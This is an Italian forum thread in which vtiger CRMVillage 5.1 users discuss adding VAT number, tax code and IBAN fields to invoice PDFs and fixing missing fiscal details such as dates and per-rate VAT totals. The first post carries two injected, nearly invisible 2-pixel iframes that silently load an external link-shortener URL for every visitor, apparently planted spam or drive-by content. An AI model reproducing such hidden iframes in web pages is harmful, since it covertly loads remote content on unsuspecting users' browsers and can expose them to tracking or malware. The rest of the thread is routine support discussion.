CRM Village 5.1 aggiungere P.IVA , CF e IBAN su pdf fatture

edited February 2011 in Vote Up0Vote Down
Salve a tutti,

ho installato la versione multipiattaforma di vtiger 5.1 versione CRMVillage, e funziona tutto benissimo, solamente ho trovato una carenza non da poco per il mercato italiano; ho creato i campi P.iva C.fiscale e Iban che nell'anagrafica aziende mancava, ora però mi trovo in difficoltà per l'inserimento di questi campi nel template pdf delle fatture.
Ho provato a seguire la guida di vtiger-italia, ma i file php del template differiscono molto fra la versione "standard" e quella crmvillage.

thanks. <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

Comments

  • 9 Comments sorted by Votes Date Added
  • i campi piva e cf sono presenti per le aziende nel blocco "informazioni azienda" nella 5.1 crmvillage...
  • ciao,

    ho reinstallato la versione crmvillage, perchè pensavo che nelle varie prove che avevo fatto, avevo potuto cancellare il campi fiscali, ma invece anche dopo la reinstallazione questi campi proprio non li vedo...

    allego uno screenshot della scheda azienda per esempio.

    forse mi sono spiegato male, ma i campi fiscali che sto cercando non sono quelli inerenti alla scheda "della mia azienda (che infatti li trovo al loro posto nella scheda delle impostazioni)" ma i campi nella scheda delle aziende mie clienti e che poi saranno inseriti nelle fatture.

    saluti

    jonathan
  • ciao jonathan,

    no non ti sei spiegato male.
    i campi effettivamente mancano dallo screenshot che hai allegato.

    con admin i campi si vedono o no ?
    la tua è una migrazione o una nuova installazione ?

    denis
  • si ma in realtà la fattura pdf generata da vtiger (mi riferisco a quella di crmvillage) è inutilizzabile perchè una fattura deve contenere, oltre al numero progressivo, anche una data precisa, non il periodo di validità. hihi! "periodo di validità" fa sorridere. anche "all'attenzione di" su una fattura non ha senso. piuttosto sfruttate la casella per il riferimento al n. d'ordine.
    inoltre la descrizione del prodotto (quella che si può aggiungere a mano, non appare, ed è importante).
    e poi l'iva.... cioè, ti permette di inserire prodotti con aliquote diverse e poi te le mischia tutte assieme nel totale... mentre lo sanno tutti che se fai una fattura con più aliquote (vedi 20% e 4%) vanno specificati i totali delle varie aliquote... così non fa per niente bene. e neppure la fattura con una sola aliquota non specifica la percentuale ma solo l'importo. viene dato invece spazio ad una colonna "% sconto" che non ha questa grossa importanza rispetto ad altri dati, anche perchè lo sconto può non essere solo in % e comunque può venire stornato subito alla fonte.
    anche gli eventuali riferimenti ai ddt ed alla loro data... insomma... senza offesa ma.. questa è un po' la fattura della barbie. basterebbe prendere una fattura vuota e copiarne i campi. se fossi capace di sistemare il layout del generatore dei pdf lo farei io.
  • ciao carloz, più che volentieri!

    puoi anche contattarmi via mail se vuoi (aggiungendo @email.it al mio nick), io sinceramente non saprei tecnicamente come riorganizzare il modulo fattura, ma so quali dati è indispensabile inserire per poter fare in modo che la fattura sia utilizzabile fiscalmente a tutti gli effetti. se fai una ricerca su google "immagini" trovi i più svariati modelli, ma io credo che si possa, partendo dal modello che è già disponibile, utilizzare/riorganizzare i dati che già sono presenti nel crm.
  • grazie della segnalazione. sottopongo la questione alla barbie e sento cosa dice (è la nostra capo progetto).

    rimandendo seri, invece, prendo nota delle indicazioni e vedo di inserirle nel service pack che rilasceremo a breve.

    che ne dite se raccogliamo una lista di queste imperfezioni e sistemiamo il tutto?

    dade
  • grazie della segnalazione. sottopongo la questione alla barbie e sento cosa dice (è la nostra capo progetto).

    rimandendo seri, invece, prendo nota delle indicazioni e vedo di inserirle nel service pack che rilasceremo a breve.

    che ne dite se raccogliamo una lista di queste imperfezioni e sistemiamo il tutto?

    dade

    -inizio con la modifica del periodo di validità in data
    -manca il tipo di pagamento e le scadenze di pagamento
    -iban del cliente
    -totale netto deve essere l'imponibile (quindi il totale senza iva)
    -gestione dei vari totali in base all'iva
  • salve,
    se può interessare, in attesa di una patch ufficiale, ho aggiunto al layout pdf il corretto valore del totale netto e sostituito il periodo di validità con la data documento, nel caso non venga indicata una data di fine validità.
Sign In or Register to comment.